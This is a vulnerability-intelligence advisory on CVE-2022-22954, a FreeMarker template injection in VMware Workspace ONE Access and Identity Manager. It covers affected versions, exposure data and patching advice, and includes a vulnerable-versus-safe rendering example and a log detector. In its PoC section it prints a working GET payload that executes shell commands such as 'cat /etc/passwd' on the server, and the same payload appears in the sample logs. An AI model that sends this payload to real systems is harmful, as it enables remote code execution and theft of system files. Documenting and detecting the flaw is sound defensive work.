Multiple VMware Products Found Vulnerable to Server-Side Template Injection CVE-2022-22954

Updated on July 16, 2025
Published on April 15, 2022
5 minute read
Category: Vulnerability Intelligence
Vulnerability Class: Server-Side Template Injection / RCE
CVE ID: CVE-2022-22954
CVSS:3.0 Score: 9.8

Executive Summary

  • CloudSEK’s Customer Threat Research Team analyzed a remote code execution vulnerability impacting VMware products, including Workspace ONE Access and Identity Manager.
  • VMware Workspace ONE Access gives users faster access to SaaS, web, and native mobile apps with Multi-Factor Authentication (MFA), conditional access, and single sign-on; VMware Identity Manager (vIDM) is Workspace ONE's identity and access management component.
  • The server-side template injection has been assigned CVE-2022-22954 with a critical CVSSv3 base score of 9.8. The affected versions are:
    • VMware Workspace ONE Access Appliance - 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
    • VMware Identity Manager Appliance - 3.3.6, 3.3.5, 3.3.4, 3.3.3
  • VMware has released patches that fix this vulnerability; affected appliances should be updated.

Analysis

  • On 6 April 2022, VMware released an advisory (VMSA-2022-0011) addressing eight vulnerabilities in multiple VMware products.
  • CVE-2022-22954 is a server-side template injection (SSTI) vulnerability in the FreeMarker templating used by the affected versions, and it can lead to remote code execution. It impacts VMware Workspace ONE Access and VMware Identity Manager and has been assigned a critical CVSSv3 base score of 9.8.
  • To exploit the vulnerability, an unauthenticated attacker with network access to the appliance only needs to send a specially crafted HTTP request to a vulnerable VMware Workspace ONE Access or Identity Manager instance.
  • Successful exploitation results in remote code execution on the vulnerable server.

Information from OSINT

  • A Shodan search revealed 711 publicly exposed VMware Workspace ONE instances.
  • Several threat actors, including APT groups, have targeted VMware products in the past to conduct attacks ranging from ransomware to espionage.
[Figure: Publicly reachable VMware Workspace ONE instances (Shodan)]

Information from Cybercrime Platforms

  • Multiple threat actors have been discussing this vulnerability on various cybercrime forums and Telegram channels (see the Appendix for screenshots).
  • The discussions cover:
    • Ways to increase the impact by chaining this bug with other exploits.
    • Shodan queries to find exposed instances in the wild.
    • Working proof-of-concept (PoC) requests, demonstrated with intercepting proxies such as Burp Suite.

How does SSTI Result in Remote Code Execution?

  • A server-side template injection (SSTI) vulnerability frequently gives an attacker the ability to execute commands on the remote server. The attack class is well documented and affects most major template engines, for example FreeMarker and Velocity (Java), Twig (PHP), and Jade/Pug (Node.js).
  • SSTI occurs whenever user input is concatenated directly into the template source rather than being passed to the template as data. The engine then parses the attacker's input as part of the template, so the attacker can inject arbitrary template directives.
  • In FreeMarker those directives can reach the engine's utility classes: the ?new built-in used in the PoC below instantiates freemarker.template.utility.Execute, which runs arbitrary shell commands. Attackers use this to run commands or launch reverse-shell payloads, giving complete control of the server, which is what makes this vulnerability both easy to exploit and severe.
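The concatenation-versus-data distinction described above, as an added illustration that is not code from the page or from VMware. The affected product renders FreeMarker (Java) templates; Python's str.format mini-language is used here because it fails the same way when untrusted text is spliced into the template source (it exposes attribute traversal rather than FreeMarker's ?new, but the root cause is identical). The Device class, its values and the hostile deviceUdid are constructed for the demo.

```python
"""Why concatenating input into a template source is exploitable.

Added illustration for this section; it is not code from the page or from
VMware. The affected product renders FreeMarker (Java) templates; Python's
str.format mini-language is used here because it fails the same way when
untrusted text is spliced into the template rather than passed as a value.
The Device class and its values are constructed for the demo.
"""


class Device:
    """Object the error template is rendered against (constructed)."""

    def __init__(self, udid: str, api_key: str):
        self.udid = udid
        self.api_key = api_key  # must never end up in a rendered page


def render_vulnerable(device_udid: str, device: Device) -> str:
    """BAD: the request parameter becomes part of the template source.

    "{device.api_key}" in the parameter is parsed as a format field and
    evaluated, exactly as ${...} in deviceUdid is evaluated by FreeMarker
    when the parameter is built into the template text.
    """
    template = "Unable to verify device " + device_udid
    return template.format(device=device)


def render_safe(device_udid: str, device: Device) -> str:
    """GOOD: fixed template; the parameter is data and is shown verbatim."""
    template = "Unable to verify device {udid}"
    return template.format(udid=device_udid, device=device)


def demo(hostile_udid: str = "{device.api_key}") -> tuple:
    """Render the same attacker-controlled deviceUdid both ways."""
    dev = Device("4f2c1a", "s3cr3t-api-key")
    return render_vulnerable(hostile_udid, dev), render_safe(hostile_udid, dev)


if __name__ == "__main__":
    bad, good = demo()
    print("vulnerable:", bad)   # the secret leaks into the page
    print("safe:      ", good)  # the directive is printed literally
```

With a normal device identifier both functions produce the same text, which is why this class of bug survives functional testing; only a value containing template syntax separates the two.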

POC (Proof of Concept)

PoC for CVE-2022-22954 (a single GET request; {host} is the base URL of the target appliance):

{host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d

  • The above GET request returns the contents of /etc/passwd from a vulnerable server, embedded in the response body; a response containing passwd entries (for example a line starting with root:x:0:0:) confirms the host is vulnerable.
  • URL-decoded, the value of the deviceUdid parameter is the FreeMarker expression: ${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}
  • The expression instantiates FreeMarker's Execute utility class through the ?new built-in and calls it with a shell command, so replacing cat /etc/passwd with any other command gives arbitrary command execution.

Impact & Mitigation

Impact
  • Attackers can use this vulnerability to gain unauthorized access to, and then escalate privileges on, VMware Workspace ONE Access and Identity Manager servers.
  • The vulnerability leads directly to RCE (remote code execution) on the appliance.
  • RCE can lead to devastating follow-on attacks including, but not limited to, ransomware campaigns.

Mitigation
  • Apply the patches VMware released for the affected Workspace ONE Access and Identity Manager versions listed above.
  • Since exploitation only requires network access to the web interface, check whether appliances are reachable from the internet (the Shodan results above show many are) and restrict access where exposure is not required.
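While the patches above are rolled out, defenders will want to know whether the request from the PoC section has already been sent at their appliances. The following detection is an added example, not code from the page or from VMware: it parses combined-format access log lines, decodes each query parameter (including double-encoded values) and flags FreeMarker directives that reach the ?new built-in or the Execute/ObjectConstructor utility classes. The log lines, IP addresses and user agents are constructed; the first attack line carries the page's PoC, the third a double-encoded variant.

```python
"""Spot CVE-2022-22954 exploitation attempts in web access logs.

Added example, not from the page or VMware. It decodes each request's query
string (including double-encoded values) and flags FreeMarker directives
that reach Execute/ObjectConstructor or the ?new built-in. The log lines are
constructed in combined log format; the first attack line carries the PoC
from the page, the second attack is a double-encoded variant.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicator patterns evaluated against the decoded parameter value.
INDICATORS = {
    "freemarker ?new() instantiation": re.compile(r"\$\{.*\?new\s*\(", re.S),
    "freemarker exec class": re.compile(
        r"freemarker\.template\.utility\.(Execute|ObjectConstructor)"),
    "freemarker assign directive": re.compile(r"<#assign\b"),
}

VULN_PATH = "/catalog-portal/ui/oauth/verify"


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated URL-encoding until the value stops changing."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(target: str) -> list:
    """Return [(param, decoded_value, indicator)] for one request target."""
    parts = urlsplit(target)
    hits = []
    # parse_qs already decodes one layer; decode_fully handles the rest.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for raw in values:
            value = decode_fully(raw)
            for label, pattern in INDICATORS.items():
                if pattern.search(value):
                    hits.append((name, value, label))
                    break
    return hits


def scan_log(lines) -> list:
    """Return one alert dict per log line that carries an SSTI indicator."""
    alerts = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        hits = inspect_request(target)
        if hits:
            alerts.append({
                "target": target,
                "known_vuln_endpoint": urlsplit(target).path == VULN_PATH,
                "hits": hits,
                "line": line,
            })
    return alerts


# Constructed sample lines (combined log format).
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Apr/2022:10:15:02 +0000] "GET /catalog-portal/ui/oauth/verify'
    '?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65'
    '%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74'
    '%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d HTTP/1.1" 400 1532 "-" "python-requests/2.27.1"',
    '198.51.100.23 - - [13/Apr/2022:10:15:09 +0000] "GET /catalog-portal/ui/oauth/verify'
    '?error=&deviceUdid=4f2c1a HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Apr/2022:10:16:41 +0000] "GET /catalog-portal/ui/oauth/verify'
    '?error=&deviceUdid=%2524%257b%2522freemarker.template.utility.Execute%2522%253fnew'
    '%2528%2529%2528%2522id%2522%2529%257d HTTP/1.1" 400 1490 "-" "curl/7.81.0"',
    '198.51.100.23 - - [13/Apr/2022:10:17:00 +0000] "POST /SAAS/auth/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        param, value, label = alert["hits"][0]
        print(f"[{label}] {param}={value!r} known endpoint={alert['known_vuln_endpoint']}")
```

The indicators are matched on every query parameter, not only deviceUdid, so the same rule catches attempts against other FreeMarker-rendered parameters; known_vuln_endpoint only tells the analyst whether the request went to the path from the PoC.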

Appendix

[Figure: PoC of the exploitation of CVE-2022-22954]
[Figure: A threat actor discussing the vulnerability on a Telegram channel]
[Figure: A threat actor posting about the vulnerability on a cybercrime forum]
